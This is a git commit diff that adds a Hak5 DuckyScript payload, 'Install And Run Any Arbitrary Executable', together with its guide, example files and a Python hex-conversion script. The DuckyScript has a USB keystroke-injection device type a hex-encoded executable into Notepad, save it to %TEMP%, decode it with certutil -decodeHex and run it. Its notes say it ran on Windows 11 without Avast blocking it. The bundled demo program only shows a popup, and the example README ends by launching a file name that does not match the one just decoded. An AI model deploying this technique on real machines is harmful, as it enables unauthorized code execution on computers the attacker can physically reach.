Merge pull request #347 from aleff-github/patch-64
Install And Run Any Arbitrary Executable - No Internet And Root Neededpull/393/merge
commit
bf2dfb7c17
|
@ -0,0 +1,125 @@
|
||||||
|
# Install And Run Any Arbitrary Executable - No Internet And Root Needed
|
||||||
|
|
||||||
|
Through this guide you will be able to create executable programs that can be installed via DuckyScript in such a way as to avoid using the Internet altogether. This type of installation can lead to serious damage to machines so do it only if you are fully aware and sure of what you are doing, in this example you will already find the code in hexadecimal but if you want to be sure recompile the executable following the following guide.
|
||||||
|
|
||||||
|
Executables have been removed for security reasons.
|
||||||
|
|
||||||
|
**Category**: Execution
|
||||||
|
|
||||||
|
# Guide to Creating an Executable Program using Python
|
||||||
|
|
||||||
|
## Introduction
|
||||||
|
|
||||||
|
This guide provides detailed instructions on how to use Python to create an executable program, generate hexadecimal code, and automate the execution of the application trough DuckyScript. Practical example in assets directory.
|
||||||
|
|
||||||
|
## Creating the Python Program
|
||||||
|
|
||||||
|
To begin, create a Python program that performs the desired functionality. You can use any programming language of your choice, but for this guide, we'll be using Python.
|
||||||
|
|
||||||
|
```python
|
||||||
|
import ctypes
|
||||||
|
|
||||||
|
ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
|
||||||
|
```
|
||||||
|
|
||||||
|
## Creating the Executable using PyInstaller
|
||||||
|
|
||||||
|
Once the Python program is ready, we can use PyInstaller to create an executable file. PyInstaller converts the Python program into a standalone executable that can be run on any compatible system without requiring Python to be installed.
|
||||||
|
|
||||||
|
Install PyInstaller using the following command:
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
pip install pyinstaller
|
||||||
|
```
|
||||||
|
|
||||||
|
To create the executable, run the following command in the terminal:
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
pyinstaller --onefile full/path/to/the/file/example.py
|
||||||
|
```
|
||||||
|
|
||||||
|
Replace `example.py` with the filename of your Python script. The `--onefile` flag ensures that the output is a single executable file. Remember that the executable file can be found within the path `dist/example.exe`.
|
||||||
|
|
||||||
|
## Generating Hexadecimal Code
|
||||||
|
|
||||||
|
Next, we'll generate the hexadecimal code from the executable file. This step is necessary if you intend to automate the execution of the program.
|
||||||
|
|
||||||
|
To generate the `hexadecimal` code, you can use various methods or libraries. In this case I decided to create another program in Python capable of doing this conversion, the partial code is as follows but you can find the entire file in the assets folder.
|
||||||
|
|
||||||
|
```python
|
||||||
|
# Rest of the code...
|
||||||
|
with open(filename, 'rb') as file:
|
||||||
|
binary_data = file.read()
|
||||||
|
hex_code = binascii.hexlify(binary_data).decode()
|
||||||
|
# ...
|
||||||
|
```
|
||||||
|
|
||||||
|
## Creating a DuckyScript to Automate Execution
|
||||||
|
|
||||||
|
To create the payload in DuckyScript you simply add the hexadecimal code inside a STRING command immediately after opening the notepad.
|
||||||
|
|
||||||
|
```duckyscript
|
||||||
|
DEFINE #HEX_CODE <hexadecimal_code>
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING notepad.exe
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING #HEX_CODE
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
ALT F
|
||||||
|
DELAY 1000
|
||||||
|
STRING S
|
||||||
|
DELAY 1000
|
||||||
|
ALTSTRING "%TEMP%\script.hex"
|
||||||
|
```
|
||||||
|
|
||||||
|
Replace `<hexadecimal_code>` with the actual hexadecimal code generated in the previous step. I used a combo ALT F and STRING S for save the file using `"%TEMP%\script.hex"` that save it in a `TEMP` directory
|
||||||
|
|
||||||
|
## Decoding Hexadecimal Code and Executing the Program
|
||||||
|
Now, we need to decode the hexadecimal code and execute the program. We can use the `certutil` command to accomplish this.
|
||||||
|
|
||||||
|
Once saved the file with a hex extension, run the following command in the Command Prompt:
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
certutil -f -decodeHex "%TEMP%\script.hex" "%TEMP%\script.exe"
|
||||||
|
```
|
||||||
|
|
||||||
|
Replace `script.exe` with the desired output filename for the decoded program.
|
||||||
|
|
||||||
|
Finally, run the executable on the computer, or any other compatible device, to open start execution of the program.
|
||||||
|
|
||||||
|
These are the steps required to create an executable program with Python, generate the hexadecimal code, and automate its execution. Feel free to modify the instructions to suit your specific needs or programming language preferences.
|
||||||
|
|
||||||
|
Happy Hacking!
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Aleff :octocat: </h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/aleff-github">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Instagram
|
||||||
|
</td>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Discord
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,77 @@
|
||||||
|
# Example
|
||||||
|
|
||||||
|
Executables have been removed for security reasons.
|
||||||
|
|
||||||
|
## File list
|
||||||
|
|
||||||
|
- Python code: `example.py`
|
||||||
|
- Convert to hex script: `convert_to_hex.py`
|
||||||
|
- Executable file compiled using pyinstaller: `dist/example.exe`
|
||||||
|
- Hexadecimal code output: `example.hex`
|
||||||
|
- File compiled from hex code using certutil: `example.exe`
|
||||||
|
|
||||||
|
## Procedure
|
||||||
|
|
||||||
|
- This Python code create a Windows popup.
|
||||||
|
|
||||||
|
```python
|
||||||
|
import ctypes
|
||||||
|
|
||||||
|
ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
|
||||||
|
```
|
||||||
|
|
||||||
|
- Create the executable
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
pyinstaller --onefile C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.py
|
||||||
|
```
|
||||||
|
|
||||||
|
- Create the hex code
|
||||||
|
|
||||||
|
```python
|
||||||
|
import binascii
|
||||||
|
|
||||||
|
def convert_to_hex(filename, output_file):
|
||||||
|
with open(filename, 'rb') as file:
|
||||||
|
binary_data = file.read()
|
||||||
|
|
||||||
|
hex_code = binascii.hexlify(binary_data).decode()
|
||||||
|
|
||||||
|
with open(output_file, 'w') as output:
|
||||||
|
output.write(hex_code)
|
||||||
|
|
||||||
|
# Esempio di utilizzo
|
||||||
|
exe_filename = 'C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/dist/example.exe'
|
||||||
|
output_filename = 'C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.hex'
|
||||||
|
convert_to_hex(exe_filename, output_filename)
|
||||||
|
```
|
||||||
|
|
||||||
|
- Create the DuckyScript payload
|
||||||
|
|
||||||
|
```duckyscript
|
||||||
|
GUI r
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN notepad.exe
|
||||||
|
DELAY 2000
|
||||||
|
STRING #HEX_CODE
|
||||||
|
DELAY 2000
|
||||||
|
ALT F
|
||||||
|
DELAY 1000
|
||||||
|
STRING S
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN "%TEMP%\example.hex"
|
||||||
|
DELAY 1000
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
ALT F4
|
||||||
|
DELAY 2000
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
|
||||||
|
DELAY 1000
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN "%TEMP%\pranhex.exe"
|
||||||
|
```
|
|
@ -0,0 +1,15 @@
|
||||||
|
import binascii
|
||||||
|
|
||||||
|
def convert_to_hex(filename, output_file):
|
||||||
|
with open(filename, 'rb') as file:
|
||||||
|
binary_data = file.read()
|
||||||
|
|
||||||
|
hex_code = binascii.hexlify(binary_data).decode()
|
||||||
|
|
||||||
|
with open(output_file, 'w') as output:
|
||||||
|
output.write(hex_code)
|
||||||
|
|
||||||
|
# Esempio di utilizzo
|
||||||
|
exe_filename = 'C:/Users/Aleff/Documents/GitHub/tmp/TODO Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/dist/example.exe'
|
||||||
|
output_filename = 'C:/Users/Aleff/Documents/GitHub/tmp/TODO Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.txt'
|
||||||
|
convert_to_hex(exe_filename, output_filename)
|
|
@ -0,0 +1 @@
|
||||||
|
here should be present the hex content
|
|
@ -0,0 +1,3 @@
|
||||||
|
import ctypes
|
||||||
|
|
||||||
|
ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
|
|
@ -0,0 +1,49 @@
|
||||||
|
REM ###########################################################################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
REM # Category : Execution |
|
||||||
|
REM # Target : Windows 10/11 |
|
||||||
|
REM # |
|
||||||
|
REM ###########################################################################################
|
||||||
|
|
||||||
|
|
||||||
|
REM Requirements:
|
||||||
|
REM - Nothing
|
||||||
|
|
||||||
|
|
||||||
|
REM Define here your hexadecimal code
|
||||||
|
DEFINE #HEX_CODE example
|
||||||
|
|
||||||
|
|
||||||
|
REM Note:
|
||||||
|
REM - Tested on Windows 11
|
||||||
|
REM - Running checked but not blocked by Avast antivirus
|
||||||
|
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN notepad.exe
|
||||||
|
DELAY 2000
|
||||||
|
STRING #HEX_CODE
|
||||||
|
DELAY 2000
|
||||||
|
ALT F
|
||||||
|
DELAY 1000
|
||||||
|
STRING S
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN "%TEMP%\example.hex"
|
||||||
|
DELAY 1000
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
ALT F4
|
||||||
|
DELAY 2000
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
|
||||||
|
DELAY 1000
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN "%TEMP%\example.exe"
|
Loading…
Reference in New Issue